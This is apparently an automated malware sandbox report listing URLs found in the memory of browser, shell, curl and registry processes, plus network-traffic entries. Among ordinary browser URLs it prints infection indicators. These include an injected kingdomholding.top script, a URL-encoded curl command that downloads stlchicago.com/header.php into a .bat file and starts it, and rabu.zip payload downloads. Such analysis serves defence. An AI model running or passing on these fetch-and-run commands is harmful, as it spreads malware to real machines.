Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8H
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/modal.jquery.ui.bridge.js?swwsy8J
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/popover.js?swwsy8
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/bootstrap/js/tooltip.js?swwsy8
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/images/Testimonials/Aging_featured-2.jpg
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/banner-slider.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/thrivequestion.js?swwsy8
Source: chrome.exe, 00000000.00000003.2421719268.0000742401C7D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fountainofhealth.ca/themes/custom/foh/js/thrivequestion.js?swwsy8ript
Source: chrome.exe, 00000000.00000003.2257873337.000074240335C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://i.ytimg.com/vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgw
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA10WNpO.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bAqmF.img
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hIktm.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hMa61.img
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42cl9.img
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://kingdomholding.top/ss/fon.js
Source: chrome.exe, 00000000.00000003.2137421272.00007424027EB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://kingdomholding.top/ss/index.js?5e7da6cb85fe8b1284
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://news.gallup.com/poll/247016/conservatives-greatly-outnumber-liberals-states.aspx
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2024391755.0000000002A96000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1588575943.0000000002A99000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json
Source: chrome.exe, 00000000.00000003.2419079385.0000742401112000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=jsonator
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=jsonr
Source: explorer.exe, 00000014.00000000.1343526292.000000000BCE6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1922881890.000000000BD34000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2103016733.000000000BD28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1589213992.000000000BD34000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comeru
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://redirector.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win6
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://stacker.com/
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://stacker.com/politics/states-most-conservatives-0
Source: tar.exe, 0000001F.00000003.1484016039.0000011891AE7000.00000004.00000020.00020000.00000000.sdmp, avutil-59.dll1.31.dr, avutil-59.dll.31.dr	String found in binary or memory: https://streams.videolan.org/upload/
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wigreports.com/about/
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: explorer.exe, 00000014.00000003.2021431230.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.0000000008519000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/32.dlllh
Source: explorer.exe, 00000014.00000000.1338126627.0000000008403000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.000000000842F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comLR
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.270towin.com/
Source: pnf1.dll0.31.dr	String found in binary or memory: https://www.catcert.cat/verCIT-10
Source: pnf1.dll1.31.dr, pnf1.dll0.31.dr	String found in binary or memory: https://www.catcert.net/verarrel
Source: hw.dll.31.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.financebuzz.com/clever-debt-payoff-55mp?utm_source=msn&utm_medium=feed&synd_slide=1&synd
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.forbes.com/sites/elanagross/2020/10/28/trump-administration-uses-philadelphia-protests-t
Source: client32.exe.31.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ac2ulwywnwgn2xush6ktfxep2vqq_3070/jflookgnkcckho
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acahfy6bgvyjwyod7x6z6ar3cd4q_138.1/mfhmdacoffpmi
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ad6bqrogtrdeb2aualzvp3izob2a_3/hajigopbbjhghbfim
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adehgvka4qgdcbt6kjgfejd54juq_1331/efniojlnjndmcb
Source: chrome.exe, 00000000.00000003.2866929758.0000742400F3F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/adsyhmqqe7lu5n7nvusq66g3hutq_9834/hfnkpimlhhgiea
Source: chrome.exe, 00000000.00000003.1694503576.0000742403D1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/dl/release2/chrome_component/ngifsy4k4mu7bcrdyhc4vjaocy_2025.4.2.0/
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/autos/buying/if-your-old-car-has-any-of-these-16-problems-consider-buying-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/health/medical/scientists-reveal-new-findings-about-older-adults-who-take-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/15-attributes-of-truly-good-men/ss-AA1hJKQY
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/there-are-8-types-of-intelligence-which-one-is-yo
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/if-any-of-these-11-things-describes-you-you-ve-climb
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/george-santos-former-campaign-treasurer-pleads-guilty-to-fed
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/the-state-with-the-most-liberals-isn-t-userfornia-or-new-yor
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-asks-for-jan-6-dismissal-because-coup-attempt-was-part
Source: explorer.exe, 00000014.00000003.1585593064.0000000006C95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1919124163.0000000006C95000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2018621481.0000000006C95000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/the-most-stunning-space-images-captured-in-2023-so-far/ar-
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/russian-official-proposes-invading-five-nato-countries/ar-AA1hJ
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/the-nobel-peace-prize-will-be-announced-in-oslo-the-laureate-is
Source: explorer.exe, 00000014.00000003.2018621481.0000000006C49000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: tar.exe, 0000001F.00000003.1484016039.0000011891AE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/
Source: explorer.exe, 00000014.00000003.1920095843.000000000BE27000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header
Source: curl.exe, 00000030.00000002.2173580798.000002428A570000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2172645632.000002428A5BD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php
Source: curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php$
Source: explorer.exe, 00000014.00000003.2021431230.0000000008547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php%22%20-o%20%22C:/ProgramData/cvcv.bat%22%20%26%26%20start%20/mi
Source: chrome.exe, 00000000.00000003.1693916175.0000742401E1C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php%22%20-o%20%22C:/ProgramData/cvcv.bat%22%20&&%20start%20/min%20
Source: curl.exe, 0000001B.00000002.1454082363.000001D0850F7000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB967000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php-oC:
Source: curl.exe, 0000001B.00000002.1454082363.000001D085107000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001B.00000003.1453761095.000001D085104000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php2
Source: curl.exe, 00000030.00000002.2173580798.000002428A577000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.php32
Source: curl.exe, 00000029.00000002.1989082851.00000257DB9B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988111962.00000257DB9B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpG
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpP
Source: curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000002.1988835958.00000257DB977000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpR
Source: curl.exe, 00000029.00000002.1989082851.00000257DB9B0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988111962.00000257DB9B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpc
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpk
Source: curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000002.2173580798.000002428A58A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2173269137.000002428A587000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/header.phpt
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb
Source: curl.exe, 0000001E.00000002.1476343582.0000020082823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb4v
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbDriverData=C:
Source: reg.exe, 00000021.00000002.1486924185.000001CAFA9E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbLOCALAPPDATA=C:
Source: curl.exe, 0000001E.00000002.1476343582.0000020082810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbWinsta0
Source: curl.exe, 0000001E.00000002.1476343582.0000020082819000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb_L
Source: curl.exe, 0000001E.00000002.1476343582.0000020082810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbcurl
Source: client32.exe, 00000020.00000003.1787909325.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbfC
Source: client32.exe, 00000020.00000003.1787909325.0000000000BC8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1492177550.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000020.00000003.1491464181.0000000000BBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbp
Source: curl.exe, 0000001E.00000002.1476343582.0000020082823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.stlchicago.com/rabu.zip??56cfb29adde612865acbpv
Source: explorer.exe, 00000014.00000000.1327863404.0000000006C58000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.theatlantic.com/politics/archive/2014/02/the-origin-of-liberalism/283780/
Source: chrome.exe, 00000000.00000003.2420598347.0000742401C63000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreport
Source: chrome.exe, 00000000.00000003.1856136210.0000742401B77000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/cspreportframe
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3390319725.00007424004D2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3269307697.0000742402162000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.3350009991.000074240118D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2543300071.00007424014C7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX$
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX(
Source: chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws
Source: chrome.exe, 00000000.00000003.2826709789.00007424004A5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws(
Source: chrome.exe, 00000000.00000003.2422198462.0000742401D2E000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2665480326.00007424003C4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR
Source: chrome.exe, 00000000.00000003.2907199839.00007424011D8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR(
Source: chrome.exe, 00000000.00000003.2419319555.0000742401BA1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR34
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000000.00000003.2421879023.0000742401E79000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlmin.js
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-embed-player.vflset/www-embed-player.js
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.css
Source: chrome.exe, 00000000.00000003.3269307697.0000742402173000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/player/3b4b7883/www-player.csseHandleror
Source: chrome.exe, 00000000.00000003.2420969918.00007424015CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/youtubei/v1/log_event?alt=json
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2422078483.0000742401D9B000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2217660889.0000742401B31000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: chrome.exe, 00000000.00000003.2297972034.0000742401714000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
